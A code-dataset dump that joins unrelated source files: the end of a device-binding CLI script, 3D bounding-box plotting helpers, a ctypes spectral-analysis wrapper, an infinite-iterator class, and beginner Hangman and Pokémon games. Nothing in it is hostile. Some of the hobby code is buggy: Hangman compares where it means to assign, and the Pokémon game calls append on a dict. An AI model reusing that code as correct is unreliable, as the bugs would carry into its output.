display_devices("Other %s devices" % device_name, no_drv,
"unused=%(Module_str)s")
def show_status():
'''Function called when the script is passed the "--status" option.
Displays to the user what devices are bound to the igb_uio driver, the
kernel driver or to no driver'''
if status_dev == "net" or status_dev == "all":
show_device_status(network_devices, "Network")
if status_dev == "baseband" or status_dev == "all":
show_device_status(baseband_devices, "Baseband")
if status_dev == "crypto" or status_dev == "all":
show_device_status(crypto_devices, "Crypto")
if status_dev == "event" or status_dev == "all":
show_device_status(eventdev_devices, "Eventdev")
if status_dev == "mempool" or status_dev == "all":
show_device_status(mempool_devices, "Mempool")
if status_dev == "compress" or status_dev == "all":
show_device_status(compress_devices , "Compress")
if status_dev == "misc" or status_dev == "all":
show_device_status(misc_devices, "Misc (rawdev)")
def parse_args():
'''Parses the command-line arguments given by the user and takes the
appropriate action for each'''
global b_flag
global status_flag
global status_dev
global force_flag
global args
if len(sys.argv) <= 1:
usage()
sys.exit(0)
try:
opts, args = getopt.getopt(sys.argv[1:], "b:us",
["help", "usage", "status", "status-dev=",
"force", "bind=", "unbind", ])
except getopt.GetoptError as error:
print(str(error))
print("Run '%s --usage' for further information" % sys.argv[0])
sys.exit(1)
for opt, arg in opts:
if opt == "--help" or opt == "--usage":
usage()
sys.exit(0)
if opt == "--status-dev":
status_flag = True
status_dev = arg
if opt == "--status" or opt == "-s":
status_flag = True
status_dev = "all"
if opt == "--force":
force_flag = True
if opt == "-b" or opt == "-u" or opt == "--bind" or opt == "--unbind":
if b_flag is not None:
sys.exit("Error: binding and unbinding are mutually exclusive")
if opt == "-u" or opt == "--unbind":
b_flag = "none"
else:
b_flag = arg
def do_arg_actions():
'''do the actual action requested by the user'''
global b_flag
global status_flag
global force_flag
global args
if b_flag is None and not status_flag:
print("Error: No action specified for devices. "
"Please give a -b or -u option", file=sys.stderr)
usage()
sys.exit(1)
if b_flag is not None and len(args) == 0:
print("Error: No devices specified.", file=sys.stderr)
usage()
sys.exit(1)
if b_flag == "none" or b_flag == "None":
unbind_all(args, force_flag)
elif b_flag is not None:
bind_all(args, b_flag, force_flag)
if status_flag:
if b_flag is not None:
clear_data()
# refresh if we have changed anything
get_device_details(network_devices)
get_device_details(baseband_devices)
get_device_details(crypto_devices)
get_device_details(eventdev_devices)
get_device_details(mempool_devices)
get_device_details(compress_devices)
get_device_details(misc_devices)
show_status()
def main():
'''program main function'''
# check if lspci is installed, suppress any output
with open(os.devnull, 'w') as devnull:
ret = subprocess.call(['which', 'lspci'],
stdout=devnull, stderr=devnull)
if ret != 0:
sys.exit("'lspci' not found - please install 'pciutils'")
parse_args()
check_modules()
clear_data()
get_device_details(network_devices)
get_device_details(baseband_devices)
get_device_details(crypto_devices)
get_device_details(eventdev_devices)
get_device_details(mempool_devices)
get_device_details(compress_devices)
get_device_details(misc_devices)
do_arg_actions()
if __name__ == "__main__":
main()
``` |
{
"source": "JHZ-2326/3d_detection_kit",
"score": 3
} |
#### File: 3d_detection_kit/vis_3d/vis_3d_mlab.py
```python
import numpy as np
import cv2
import mayavi.mlab as mlab
# ------------------------------------ Drawing 2D --------------------------------------
def draw_projected_box3d(image, qs, color=(0, 255, 0), thickness=2):
''' Draw 3d bounding box in image
qs: (8,3) array of vertices for the 3d box in following order:
1 -------- 0
/| /|
2 -------- 3 .
| | | |
. 5 -------- 4
|/ |/
6 -------- 7
'''
qs = qs.astype(np.int32)
for k in range(0, 4):
# Ref: http://docs.enthought.com/mayavi/mayavi/auto/mlab_helper_functions.html
i, j = k, (k+1) % 4
# use LINE_AA for opencv3
# cv2.line(image, (qs[i,0],qs[i,1]), (qs[j,0],qs[j,1]), color, thickness, cv2.CV_AA)
cv2.line(image, (qs[i, 0], qs[i, 1]),
(qs[j, 0], qs[j, 1]), color, thickness)
i, j = k+4, (k+1) % 4 + 4
cv2.line(image, (qs[i, 0], qs[i, 1]),
(qs[j, 0], qs[j, 1]), color, thickness)
i, j = k, k+4
cv2.line(image, (qs[i, 0], qs[i, 1]),
(qs[j, 0], qs[j, 1]), color, thickness)
return image
# ----------------------------------- Drawing 3D -----------------------------------------
def draw_3d_box_on_lidar_pc(pc, boxes_3d, fig=None, pc_color=None, box_color=(1, 1, 1), line_width=1, draw_text=True, text_scale=(1, 1, 1), color_list=None):
"""
Draw 3d box on lidar point cloud
"""
if fig is None:
fig = mlab.figure(figure=None, bgcolor=(0,0,0), fgcolor=None, engine=None, size=(1280, 960))
fig = draw_lidar_simple(pc, fig=fig, color=pc_color)
draw_gt_boxes3d(boxes_3d, fig=fig)
# mlab.show(1)
return fig
def draw_lidar_simple(pc, fig=None, color=None):
if color is None:
color = pc[:, 2]
# draw points
mlab.points3d(pc[:, 0], pc[:, 1], pc[:, 2], mode="point", color=color, figure=fig)
return fig
def draw_gt_boxes3d(gt_boxes3d, fig, color=(1, 1, 1), line_width=1, draw_text=True, text_scale=(1, 1, 1), color_list=None):
''' Draw 3D bounding boxes
Args:
gt_boxes3d: numpy array (n,8,3) for XYZs of the box corners
fig: mayavi figure handler
color: RGB value tuple in range (0,1), box line color
line_width: box line width
draw_text: boolean, if true, write box indices beside boxes
text_scale: three number tuple
color_list: a list of RGB tuple, if not None, overwrite color.
Returns:
fig: updated fig
'''
num = len(gt_boxes3d)
for n in range(num):
b = gt_boxes3d[n]
if color_list is not None:
color = color_list[n]
if draw_text:
mlab.text3d(b[4, 0], b[4, 1], b[4, 2], '%d' %
n, scale=text_scale, color=color, figure=fig)
for k in range(0, 4):
# http://docs.enthought.com/mayavi/mayavi/auto/mlab_helper_functions.html
i, j = k, (k+1) % 4
mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [
b[i, 2], b[j, 2]], color=color, tube_radius=None, line_width=line_width, figure=fig)
i, j = k+4, (k+1) % 4 + 4
mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [
b[i, 2], b[j, 2]], color=color, tube_radius=None, line_width=line_width, figure=fig)
i, j = k, k+4
mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [
b[i, 2], b[j, 2]], color=color, tube_radius=None, line_width=line_width, figure=fig)
mlab.view(azimuth=180, elevation=70, focalpoint=[ 12.0909996 , -1.04700089, -2.03249991], distance=92.0, figure=fig)
return fig
``` |
{
"source": "jhzhuang/Spectral_Analyzer",
"score": 2
} |
#### File: jhzhuang/Spectral_Analyzer/spectral_analyzer.py
```python
from ctypes import *
dll = cdll.LoadLibrary('lib/x64/spectral_analyzer.dll')
class C_Scheme_Char(Structure):
_fields_ = [("kr", POINTER(c_double)),
("ki", POINTER(c_double)),
("alpha", POINTER(c_double)),
("size", c_int)]
class C_Linear_Scheme(Structure):
_fields_ = [("coefficient", POINTER(c_double)),
("left_end", c_int),
("right_end", c_int)]
class Linear_Scheme:
''' linear interpolation @ j - 1/2 node '''
scheme_enum = 0
def __init__(self, coeff, left, right):
self.coeff = coeff
self.left = left
self.right = right
class Scheme_Char:
''' scheme character '''
def __init__(self,c_scheme_char):
self.kr = [0.0] * c_scheme_char.size
self.ki = [0.0] * c_scheme_char.size
self.alpha = [0.0] * c_scheme_char.size
self.size = c_scheme_char.size
for i in range(0, self.size):
self.kr[i] = c_scheme_char.kr[i]
self.ki[i] = c_scheme_char.ki[i]
self.alpha[i] = c_scheme_char.alpha[i]
def Spectral_Analysis(scheme, nodes = 101):
''' return modified wavenumber - alpha relation of the scheme in C_Scheme_Char type. '''
spectral_analysis = dll.Spectral_Analysis
nodes_array = c_double * nodes
scheme_array = c_double * (scheme.right - scheme.left + 1)
pi = 3.141592653589793;
kr = nodes_array()
ki = nodes_array()
alpha = nodes_array()
coefficient = scheme_array()
for i in range(0, nodes):
alpha[i] = 0.5 * pi * (i / (nodes - 1))
c_scheme_char = C_Scheme_Char(cast(kr, POINTER(c_double)),
cast(ki, POINTER(c_double)),
cast(alpha, POINTER(c_double)),
c_int(nodes))
if 0 == scheme.scheme_enum:
for i in range(0, scheme.right - scheme.left + 1):
coefficient[i] = scheme.coeff[i]
linear_scheme = C_Linear_Scheme(cast(coefficient, POINTER(c_double)),
c_int(scheme.left),
c_int(scheme.right))
spectral_analysis(pointer(c_scheme_char), pointer(linear_scheme), c_int(0))
return c_scheme_char
else:
return -1
def Max_Alpha(c_scheme_char, tol = 0.05):
''' return max alpha value satisfied with tolerance tol. '''
max_alpha = dll.Max_Alpha
max_alpha.restype = c_double
return max_alpha(pointer(c_scheme_char), c_double(tol))
def Dispersion_Mode(c_scheme_char):
''' return 0 if the scheme is fast mode, return 1 if slow mode. '''
dispersion_mode = dll.Dispersion_Mode
return dispersion_mode(pointer(c_scheme_char))
def Write_Scheme_Char(filename, c_scheme_char):
f = open(filename,'w')
f.write('VARIABLES = "alpha", "kr", "ki"\n')
f.write('ZONE I=')
f.write(str(c_scheme_char.size))
f.write(', DATAPACKING=BLOCK\n')
for i in range(0, c_scheme_char.size):
f.write(str(c_scheme_char.alpha[i]))
f.write('\t')
for i in range(0, c_scheme_char.size):
f.write(str(c_scheme_char.kr[i]))
f.write('\t')
for i in range(0, c_scheme_char.size):
f.write(str(c_scheme_char.ki[i]))
f.write('\t')
f.close()
``` |
{
"source": "Ji19283756/CycleV2",
"score": 4
} |
#### File: Ji19283756/CycleV2/infinite_iterator.py
```python
class InfIter:
def __init__(self, *list_to_be_used: list or range):
if all(isinstance(item, int) for item in list_to_be_used):
self.list_to_be_used = list(list_to_be_used)
else:
self.list_to_be_used = list(*list_to_be_used)
self.current = 0
def __iter__(self):
self.current = 0
return self
def __next__(self):
self.current += 1
return self.list_to_be_used[(self.current - 1) % len(self.list_to_be_used)]
def __repr__(self):
return f"InfIter({self.list_to_be_used})"
def __len__(self):
return len(self.list_to_be_used)
def __add__(self, value_to_be_added: list) -> list:
return self.list_to_be_used + value_to_be_added
def __setitem__(self, index: int, value_to_be_added: list):
self.list_to_be_used[index % len(self)] = value_to_be_added
def __getitem__(self, index: slice or int) -> list or str or int:
# well it wouldn't be an infinite iterator without being able to return a slice
# that's bigger than the list that's stored, so if the "to" list index is greater
# than the actual list stored, so to do so, list comprehension is used to iterate
# through the list, repeating whenever the "to" index is greater
if isinstance(index, slice):
stop = index.stop if index.stop is not None else len(self.list_to_be_used) - 1
if stop > len(self.list_to_be_used):
start = index.start if index.start is not None else 0
step = index.step if index.step is not None else 1
return [self.list_to_be_used[x % len(self)] for x in range(start, stop, step)]
else:
return self.list_to_be_used[stop % len(self.list_to_be_used)]
# gets the numbers from the slice
else:
return self.list_to_be_used[index % len(self.list_to_be_used)]
def __reversed__(self):
self.list_to_be_used = self.list_to_be_used[::-1]
return self
def get_list(self) -> list:
return self.list_to_be_used
# things that it works on
print("It works on strings")
inf_string = InfIter("hello")
for x in inf_string[:10]:
print(x)
print("You can use it on a normal list")
inf_list = InfIter(list(range(1, 6)))
for x in inf_list[:10]:
print(x)
print("you can pass a range")
inf_range = InfIter(range(1, 6))
for x in inf_range[:10]:
print(x)
print("You can use *args")
inf_int = InfIter(1, 2, 3, 4, 5)
for x in inf_int[:10]:
print(x)
print("It also works on generators")
generator_list = InfIter(x for x in range(1, 6))
for x in generator_list[:10]:
print(x)
infinite_iterator_object = InfIter(range(1, 11)) # x for x in range(1, 11, 2))
print([infinite_iterator_object[x] for x in range(20)])
multiplied_values = [x * value for x, value in zip(range(1, 11),infinite_iterator_object.get_list())]
print(infinite_iterator_object)
for thing_index, to_be_multiplied_index, value \
in zip(infinite_iterator_object, range(1, 111), multiplied_values):
print(f"{thing_index} * {to_be_multiplied_index} = {value}")
``` |
{
"source": "Ji19283756/Hangman",
"score": 4
} |
#### File: Ji19283756/Hangman/Hangman.py
```python
from random import choice
def random_word():
words = ['abject', 'belong', 'jelly', 'unnatural', 'whistle', 'little', 'hum', 'level',
'arrogant', 'circle', 'representative', 'brash', 'verse', 'report', 'ritzy',
'hammer', 'effect', 'end', 'light', 'ambitious', 'nasty', 'crayon', 'roll',
'minor', 'whisper', 'eight', 'cautious', 'curvy', 'tangible', 'stroke', 'extend',
'rhetorical', 'coherent', 'murder', 'kaput', 'testy', 'skate', 'brief', 'telling',
'count', 'carpenter', 'hesitant', 'vigorous', 'saw', 'rose', 'development',
'curve', 'boat', 'signal', 'flagrant']
word = choice(words)
underscore = "_ " * len(word)
return list(word), underscore, word
def check_guess(letter):
global mistakes, right, actual_word
if letter == "guess":
# print(actual_word)
guess_word = input("What do you think the word is?\n").lower()
if guess_word == actual_word:
right = len(word)
else:
mistakes += 1
print_board(mistakes)
print(f"Yep! {actual_word} is the word!") if guess_word == actual_word \
else print("Nope! That's not the word")
return None
elif len(letter) > 1 and letter != "guess":
print("Prints only one letter!")
return None
if letter in {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9'}:
print("Don't type numbers")
return None
else:
return letter
def print_board(mistakes):
# printed_word = "" # this is the word that will be actually printed and is based of print_word
print_worded = "".join(letter + ' ' for letter in print_word)
# this is the set of letters that will actaully be printed, based on guessed_letters
printed_guessed_letters = "".join(letter + " " for letter in guessed_letters)
draw_hangman(mistakes) # inputs the number of mistakes the user has made and draws the appropriate picture
# prints the letters that correspond to the right letters (letters in word)
print(f"{print_worded}\n{underscore}\nGuessed letters: {printed_guessed_letters}")
def check_guess_with_word(user_letter):
global right, mistakes, guessed_letters
if user_letter in word:
print(f"{user_letter} is in the word!")
for x, word_letter in enumerate(word):
if user_letter == word_letter:
print_word[x] == user_letter
right += 1
else:
print(f"{user_letter} is not in the word")
mistakes += 1
guessed_letters += user_letter
return print_word
def draw_hangman(mistakes):
hangman_body_dict = {0: " ", 1: " ", 2: " | ", 3: " | ", 4: " | ", 5: "/| ", 6: "/|\\"}
hangman_leg_dict = {0: " ", 1: " ", 2: " ", 3: "/ ", 4: "/ \\", 5: "/ \\", 6: "/ \\"}
hangman = [" "] * 3
hangman[0] = "( )" if mistakes >= 1 else " "
hangman[1] = hangman_body_dict[mistakes]
hangman[2] = hangman_leg_dict[mistakes]
print(" \n"
" _____ \n"
" | | \n"
f" {hangman[0]} | \n"
f" {hangman[1]} | \n"
f" {hangman[2]} | \n"
" /|\ ")
# ______________________________________________________________________________________________________________
guessed_letters = [] # list of the letters that have already been guessed
word, underscore, actual_word = random_word() # makes a list of the letters in the word and an undercore that matches
print_word = [" "] * len(word) # has a list of the word that will be printed
# print(word)
mistakes, right = 0, 0 # counter for the amount of words that are right and the amount of words that are wrong
print_board(mistakes)
while mistakes < 6 and not right == len(
word): # continues if you havent completed the hangman or if you havent gotten it right
guess = input("What letter do you think is in the word?\nOptions:\n-guess\n-(print one letter)\n").strip().lower()
guess = check_guess(guess) # makes sure that the input is not a number
if guess in guessed_letters:
print("you already guessed that letter")
elif guess is not None and right != len(word):
print_word = check_guess_with_word(guess) # checks if the letter is in the word
print_board(mistakes)
print(f"You lose\nThe word was {actual_word}") if mistakes == 6 else print("You win!")
``` |
{
"source": "Ji19283756/low-quality-pokemon-game",
"score": 3
} |
#### File: Ji19283756/low-quality-pokemon-game/lowQualPokeGame.py
```python
import random
from random import randrange, randint, choice
class Pokemon:
def __init__(self, name, type_, current_health='AvgHealth', cc='AvgCC', cd='AvgCD', acc='AvgAcc',
dph='AvgHit',
level=1):
attributes = {'AvgHealth': 100, 'AvgCC': 30, 'AvgCD': 30, 'AvgAcc': 70, 'AvgHit': 25, 'HiHealth': 200,
'HiCC': 60, 'HiCD': 60, 'HiACC': 90, 'HiHit': 50}
self.name = name
self.OG_name = name
self.level = level
self.type = type_
self.exp = 0
self.is_knocked_out = False
self.OG_health = attributes[current_health]
self.max_health = attributes[current_health]
self.health = attributes[current_health]
self.cc = attributes[cc]
self.cd = attributes[cd]
self.acc = attributes[acc]
self.dph = attributes[dph]
self.ex = False
def __repr__(self):
return f"{self.name}: " \
f"\nHealth: {self.health} Exp: {self.exp} Type: {self.type}\n" \
f"Level: {self.level} Knocked out: {self.is_knocked_out}"
def level_up(self, exp_gained: int):
self.exp += exp_gained
if self.exp > (self.level * 100):
self.level += 1
self.max_health += (self.level * 1.5) * 50
self.health = round(self.health + 50, 2)
print(f"{self.name}'s level is now {self.level}\n"
f"{self.name}'s max health is now {self.max_health}\n"
f"{self.name} also gains 50 health\n"
f"{self.name} now has {self.health} health")
if self.health > self.max_health:
self.health = self.max_health
# if self.health is greater than max health then it's set to max health, otherwise it's just health
def lose_health(self, damage: int):
self.health = round((self.health - damage), 2)
self.is_knocked_out = (self.health <= 0)
print(f"{(self.is_knocked_out) * f'{self.name} is knocked out'}"
f"{(not damage) * f'{self.name} now has {self.health} health'}")
def gain_health(self, potions_used: int, player):
self.health = round(self.health + heal_calc(potions_used, player), 2)
self.health = ((self.health > self.max_health) * self.max_health) + (
(self.health <= self.max_health) * self.health)
print(f"{self.name} now has {self.health} health")
def attack_pokemon(self, trainer, other_trainer, other_pokemon, damage=0):
damage = damage_calc(trainer, other_trainer, self)
other_pokemon.lose_health(damage)
exp = round(damage * 0.7, 2)
self.level_up(exp)
if damage:
print(f"{self.name} has gained {exp} exp\n"
f"{trainer.name}: {encouragement_gen(trainer, other_trainer)}")
class Trainer:
def __init__(self, name, potions, pokemon, active_pokemon):
self.name = name
self.potions = potions
self.pokemon = pokemon
self.OG_pokemon = pokemon
self.active_pokemon = 0
self.alive_pokemon = pokemon
self.alive = True
self.turn = 0
print(self.pokemon)
self.OG_pokemonDict = {self.pokemon[x].name.lower(): x for x in range(len(pokemon))}
self.pokemonDict = {self.pokemon[x].name.lower(): x for x in range(len(pokemon))}
def print_stats(self):
print(f"Name: {self.name}\n"
f"Potions: {self.potions}\n"
f"Active pokemon: {self.pokemon[self.active_pokemon]}\n"
f"Pokemon status: ")
for pokemon in self.pokemon:
if pokemon.is_knocked_out:
print(f"{pokemon.name}: Dead")
else:
print(f"{pokemon.name}: Alive (HP{pokemon.health})")
def print_pokemon_stats(self):
print("Pokemon stats: ")
for pokemon in self.pokemon:
print(pokemon)
def print_alive_pokemon(self):
for pokemon in self.pokemon:
if not pokemon.is_knocked_out:
print(pokemon.name)
def am_i_alive(self, other_player):
if self.alive_pokemon == 0:
self.alive = False
self.death_message(other_player)
return self.alive_pokemon != 0
def heal(self, potions_used):
print(f"{self.name} uses {potions_used} potion(s) to heal {self.pokemon[self.active_pokemon]}"
f"({self.pokemon[self.active_pokemon].health}HP)")
self.turn += 1
self.pokemon[self.active_pokemon].gain_health(potions_used, self)
self.potions -= potions_used
print(f"{self.name} now has {self.potions} potion(s) left")
def attack_trainer(self, other_trainer):
other_trainer_pokemon = other_trainer.pokemon[other_trainer.active_pokemon]
own_pokemon = self.pokemon[self.active_pokemon]
own_pokemon.attack_pokemon(self, other_trainer, other_trainer_pokemon)
if other_trainer_pokemon.is_knocked_out:
other_trainer.alive_pokemon = [pokemon for pokemon in other_trainer.alive_pokemon if
not pokemon.is_knocked_out]
print(f"{other_trainer.name} has {len(other_trainer.pokemon)} pokemon left")
if len(other_trainer.alive_pokemon) == 0:
other_trainer.switch_to_not_knocked_out(self, True, False)
if own_pokemon.level == 10 and not own_pokemon.ex and other_trainer.am_i_alive():
# if pokemon level==2, and is not ex, and the other player is alive
own_pokemon.name += " EX"
print(f"{own_pokemon.name} has evolved after reaching level 10 and is now "
f"{self.pokemon[self.active_pokemon].name}")
own_pokemon.ex = True
self.pokemonDict = {self.pokemon[x].name.lower(): x for x in range(len(self.pokemon))}
self.turn += 1
def switch_active(self, switch_to, Forced=False, first=False):
number_of_active = self.pokemonDict.get(switch_to)
if self.pokemon[number_of_active].is_knocked_out:
print(f"{self.name} can't switch to that pokemon because it is knocked out")
else:
if not first:
print(f"{self.name}'s active pokemon is now {self.pokemon[self.active_pokemon].name}")
print(f"{self.name} switched his main pokemon from {self.pokemon[self.active_pokemon].name}"
f" to {self.pokemon[number_of_active].name}")
self.active_pokemon = number_of_active
if not Forced:
self.turn += 1
def death_message(self, other_player):
print(f"{self.name}tries to reach for his next pokeball only to find that he has none left"
", the gravity of the situation dawns upon him as he sees all his pokemon"
" lay in front of him\n"
f"{self.name} realizes that he has no hope as all of his pokemon are knocked out"
f" \nhe looks into his rival's eyes for the last time and closes his eyes as he accepts his fate\n"
f"{other_player.name} lowers his hat to cover his eyes as he orders his "
f"{other_player.pokemon[other_player.active_pokemon].name} to commit its final attack upon"
f" {self.name}\n{self.name.upper()} HAS BEEN BRUTALLY KILLED BY {other_player.name.upper()}'S"
f"{other_player.pokemon[other_player.active_pokemon].name.upper()}")
def switch_to_not_knocked_out(self, other_player, case1_forced, case2_choice):
current = 0
if case1_forced:
for x in range(len(self.pokemon)):
if (self.pokemon[current]).is_knocked_out:
current += 1
elif not self.pokemon[current].is_knocked_out and not self.active_pokemon == current:
self.active_pokemon = current
self.turn += 1
elif case2_choice:
for pokemon in self.pokemon:
if not is_1_weak_against_2(self.pokemon,other_player.pokemon)\
and not pokemon.is_knocked_out and not pokemon == self.pokemon[self.active_pokemon]:
self.switch_active(pokemon.name.lower())
self.turn -= 2
break
if self.pokemon[self.active_pokemon].is_knocked_out:
for x in range(len(self.pokemon)):
if (self.pokemon[current]).is_knocked_out:
current += 1
elif not self.pokemon[current].is_knocked_out:
self.active_pokemon = current
self.turn -= 2
if current >= len(self.pokemon) or not self.alive:
self.alive = False
self.death_message(other_player)
# water bois
Magicarp = Pokemon(name='Magicarp', type_='water', acc='HiACC')
Clamperl = Pokemon(name='Clamperl', type_='water', current_health='HiHealth')
Frogadier = Pokemon(name='Frogadier', type_='water', cc='HiCC')
Squirtle = Pokemon(name='Squirtle', type_='water', cd='HiCD')
Gyrados = Pokemon(name='Gyrados', type_='water', dph='HiHit')
weed = Pokemon(name="420", type_='grass', dph='HiHit', cc='HiCC', cd='HiCD', acc='HiACC',
current_health="HiHealth")
# fire bois
TalonFlame = Pokemon(name='TalonFlame', type_='fire', acc='HiACC')
Entei = Pokemon(name='Entei', type_='fire', current_health='HiHealth')
Charmander = Pokemon(name='Charmander', type_='fire', cc='HiCC')
Archanine = Pokemon(name='Archanine', type_='fire', cd='HiCD')
Blaziken = Pokemon(name='Blaiziken', type_='fire', dph='HiHit')
##grass bois
Treecko = Pokemon(name='Treecko', type_='grass', acc='HiACC')
Torterra = Pokemon(name='Torterra', type_='grass', current_health='HiHealth')
Exeggutor = Pokemon(name='Exeggutor', type_='grass', cc='HiCC')
Bulbasaur = Pokemon(name='Bulbasaur', type_='grass', cd='HiCD')
Sceptile = Pokemon(name='Sceptile', type_='grass', dph='HiHit')
# weed=Pokemon(name="420",type_='grass',dph='Hidph',cc='HiCC',cd='HiCD',acc='HiACC',current_health="HiHealth")
grassPokemonList = [Treecko, Torterra, Exeggutor, Bulbasaur, Sceptile]
firePokemonList = [TalonFlame, Entei, Charmander, Archanine, Blaziken]
waterPokemonList = [Magicarp, Clamperl, Frogadier, Squirtle, Gyrados]
all_pokemon = waterPokemonList + firePokemonList + grassPokemonList
grassPokemon = {'hiacc': Treecko, 'hihealth': Torterra, 'hicc': Exeggutor, 'hicd': Bulbasaur, 'hidph': Sceptile}
firePokemon = {'hiacc': TalonFlame, 'hihealth': Entei, 'hicc': Charmander, 'hicd': Archanine, 'hidph': Blaziken}
waterPokemon = {'hiacc': Magicarp, 'hihealth': Clamperl, 'hicc': Frogadier, 'hicd': Squirtle, 'hidph': Gyrados}
PokeDict = {'grass': grassPokemon, 'fire': firePokemon, 'water': waterPokemon}
def is_1_weak_against_2(pokemon1_type: str, pokemon2_type: str) -> bool:
if pokemon1_type == pokemon2_type:
return None
elif pokemon1_type == 'grass':
return pokemon2_type == "water"
elif pokemon1_type == 'water':
return pokemon2_type == "grass"
elif pokemon1_type == 'fire':
return pokemon2_type == "water"
def damage_calc(trainer: Trainer, other_trainer: Trainer, self) -> int:
other_pokemon = other_trainer.pokemon[other_trainer.active_pokemon]
dph = self.dph
name = self.name
pokemon_misses = randrange(0, 100) > self.acc
if pokemon_misses:
print(f"{name} missed\n"
f" {trainer.name}: WTF {self.name.upper()}? {insult_gen()}")
return 0
else:
weak_attack = is_1_weak_against_2(self.type, other_pokemon.type)
# print(name+"nomrally does"+str(self.dph))
type_multiplier = ((0.75 * (weak_attack == True)) +
(1.25 * (weak_attack == False)) +
((weak_attack == None) * 1))
crit_mulitplier = round(1 + (randrange(0, 100) > self.cc) * (self.cd * .01), 2)
# print("the type multiplier causese "+name+"to do "+str(dph*type_multiplier)+"damage")
dph = round(dph * type_multiplier * crit_mulitplier, 2)
print(f"{trainer.name}'s {name} attacks\n"
f"{other_trainer.name}'s {other_pokemon.name} (HP{other_pokemon.health})\n"
f"{name} does {dph} damage")
return dph
def heal_calc(potions_used: int, player: Trainer) -> int:
RNG = randrange(0, 100)
heal_amount = ((RNG > 99) * -5) + \
((RNG <= 99 and RNG >= 90) * 70) + \
((RNG < 90) * 50)
print(f"{player.name}'s potions(s) "
f"{(RNG > 99) * 'did not work that well, so each potion causes a loss of 5 health'}"
f"{(RNG <= 99 and RNG >= 90) * 'did not exactly work that well, so each potion causes a loss of 5 health'}"
f"{(RNG < 90) * 'successfully heals, so each potion causes a gain of 50 health'}")
return heal_amount * potions_used
def choose_pokemon(personal_list: list, not_finished: bool, pal="Stranger: ") -> list:
def pokemon_choice(type, personal_list, input_not_valid=True, pal="Stranger: "):
print(f"{pal} Now, what special trait do you want?"
f"\n the options are: \nhiacc \nhicc \nhicd \nhidph"
f" \nonce you've made your pick, print out your selection"
f" (enter ? to find out what those abbreviations mean)")
msg = f"{pal} You already chose that specific pokemon, choose a different special trait"
while input_not_valid:
string = input().lower().strip()
try:
if (PokeDict[type])[string] in personal_list:
print(msg)
elif string == '?':
print(f'{pal} Ok so if I remember correctly'
f'\nhiacc = High Accuracy\nhihealth= High Health'
f'\nhicc = High Critical Chance\nhicd = High Critical Damage'
f'\nhidph = High Damage Per Hit')
else:
print(f'{pal}Wow you got a {PokeDict[type][string].name}')
if (PokeDict[type])[string].type == "fire":
firePokemonList.remove((PokeDict[type])[string])
elif (PokeDict[type])[string].type == "water":
waterPokemonList.remove((PokeDict[type])[string])
elif (PokeDict[type])[string].type == "grass":
grassPokemonList.remove((PokeDict[type])[string])
return (PokeDict[type])[string]
except KeyError:
print(f"{pal} What? That's not an option, try again")
while not_finished < 3:
print(f'{pal} pick either water, fire, or grass')
types = ['grass', 'water', 'fire']
typeChoice = input().lower().strip()
if typeChoice in types:
personal_list.append(pokemon_choice(typeChoice, personal_list))
not_finished += 1
else:
print(f"{pal}What? That wasn't one of the options, choose again")
return personal_list
def decide(final_choice: bool, personal_list: list, first_dialog: bool) -> list:
while True:
print(f'{pal}so these are the pokemon that you have chosen:')
for pokemon in personal_list:
print(pokemon.name)
print(f"{pal}{first_dialog * 'No lie, those choices of pokemon were PRETTY BAD'}" +
(not first_dialog) * ("...to be honest I think that these new pokemon are"
" worse than your original choice" +
", but i still belive in your ability now that I think about it, "
"do you wanna switch or do you wanna fight with those pokemon?\n(print switch or stay)"))
answer = input().lower().strip()
if answer == 'switch':
temp_dict = {"fire": firePokemonList, "water": waterPokemonList, "grass": grassPokemonList}
for pokemon in personal_list:
list_to_append_to = temp_dict[pokemon.type]
temp_dict.append(pokemon)
# if pokemon.type == 'fire':
# firePokemonList.append(pokemon)
# if pokemon.type == 'water':
# waterPokemonList.append(pokemon)
# if pokemon.type == 'grass':
# grassPokemonList.append(pokemon)
personal_list = []
personal_list = choose_pokemon(personal_list, 0)
first_dialog = False
elif answer == 'stay':
break
else:
print(f"{pal}what?\nLook I'm going to say this again")
return personal_list
def createNew(pokemon_amount: int, return_list=[]) -> list:
while len(return_list) < pokemon_amount:
random_type = choice([0, 1, 2])
if random_type == 0 and firePokemonList:
fire_pokemon = choice(firePokemonList)
return_list.append(fire_pokemon)
firePokemonList.remove(fire_pokemon)
elif random_type == 1 and waterPokemonList:
water_pokemon = choice(waterPokemonList)
return_list.append(water_pokemon)
waterPokemonList.remove(water_pokemon)
elif random_type == 2 and grassPokemonList:
grass_pokemon = choice(grassPokemonList)
return_list.append(grass_pokemon)
return return_list
def createEnemy(currentPlayer: Trainer) -> list:
enemy_list = []
for pokemon in currentPlayer.pokemon:
if is_1_weak_against_2(pokemon.type, 'fire') and firePokemonList:
fire_pokemon = choice(firePokemonList)
enemy_list.append(fire_pokemon)
firePokemonList.remove(fire_pokemon)
elif is_1_weak_against_2(pokemon.type, 'water') and waterPokemonList:
water_pokemon = choice(waterPokemonList)
enemy_list.append(water_pokemon)
waterPokemonList.remove(water_pokemon)
elif is_1_weak_against_2(pokemon.type, 'grass') and grassPokemonList:
grass_pokemon = choice(grassPokemonList)
enemy_list.append(grass_pokemon)
grassPokemonList.remove(grass_pokemon)
else:
enemy_list = createNew(1, enemy_list)
return enemy_list
def enemyDesicionTree(enemy: Trainer, player: Trainer):
switch_times = 0
enemy.turn = ((enemy.turn >= 3) * 3) + ((enemy.turn < 3) * enemy.turn)
enemys_current_pokemon_is_knocked_out = enemy.pokemon[enemy.active_pokemon].is_knocked_out
enemy_can_switch_has_a_weak_pokemon_hasnt_already_switched_pokemon_and_has_pokemon_to_spare = \
enemy.turn >= 3 and is_1_weak_against_2(enemy.pokemon[enemy.active_pokemon].type, player.pokemon[
player.active_pokemon].type) and switch_times == 0 and not len(enemy.alive_pokemon) == 1
current_pokemon_is_half_health_and_trainer_has_potions = enemy.pokemon[enemy.active_pokemon].health <= (
enemy.pokemon[enemy.active_pokemon].max_health) / 2 and enemy.potions >= 1
if enemys_current_pokemon_is_knocked_out:
enemy.switch_to_not_knocked_out(player, True, False)
switch_times += 1
if enemy_can_switch_has_a_weak_pokemon_hasnt_already_switched_pokemon_and_has_pokemon_to_spare:
enemy.switch_to_not_knocked_out(player, False, True)
elif current_pokemon_is_half_health_and_trainer_has_potions:
enemy.heal(1)
else:
enemy.attack_trainer(player)
